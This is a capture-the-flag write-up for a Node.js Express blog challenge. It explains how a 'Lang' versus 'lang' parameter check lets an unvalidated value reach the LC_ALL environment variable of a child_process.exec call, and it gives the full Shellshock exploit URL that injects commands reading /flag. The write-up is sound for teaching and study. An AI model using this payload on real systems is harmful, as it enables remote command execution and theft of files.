In this task we were given a blog handled by nodejs express web service. It is also provided the source in the HTML comment. There isn’t actually much to do after first sight bust if you look better you may see how to arbitrary set lang variable. You can do this requesting something lke this:

/?lang=fr_FR&Lang=xxx

Why this works? Just take a look at this piece of code taken from the filterOptions function:

    var lowered = sorted_param_names[i].toLowerCase(); if (lowered == 'lang') { filterValidLanguages(params, lowered); options['lang'] = params[sorted_param_names[i]];

sorted_param_names[i] = Lang

lowered = lang

filterValidLanguages will validate “lang” parameter value which is fr_FR and it’s correct.

options[‘lang’] = params[sorted_param_names[i]] <– this instruction will put in options[‘lang’] the value of Lang.

After this mistake we noticed that down the code our lang value was put in the environment variable LC_ALL.

env['LC_ALL'] = locale;

Since there wasn’t much else on the server we supposed to try to exploit shellshock and we got it right. Basically we used ‘echo’ command to return fake modified_date in the_ ls  _call at

child_process.exec('ls -l ' + dir, {env: env}

Final exploit:

http://ramble.9447.plumbing:8888/?lang=fr_FR&Lang=() { :; }; echo "-rw-r--r-- 1 nms users 12 Nov 29 1111.txt"; echo "-rw-r--r-- 1 nms users 12 Nov 29 "`echo 1 > /tmp/x.txt``str=$(cat /flag | tr '%5cn' ' ') ; echo ${str:0:11}""`" Blue Waves.txt"

We used substring since we were replacing the legit date which is 12 characters.

9447{IENlY2kgbidlc3QgcGFzIHVuIGRyYXBlYXUg}

Razor4x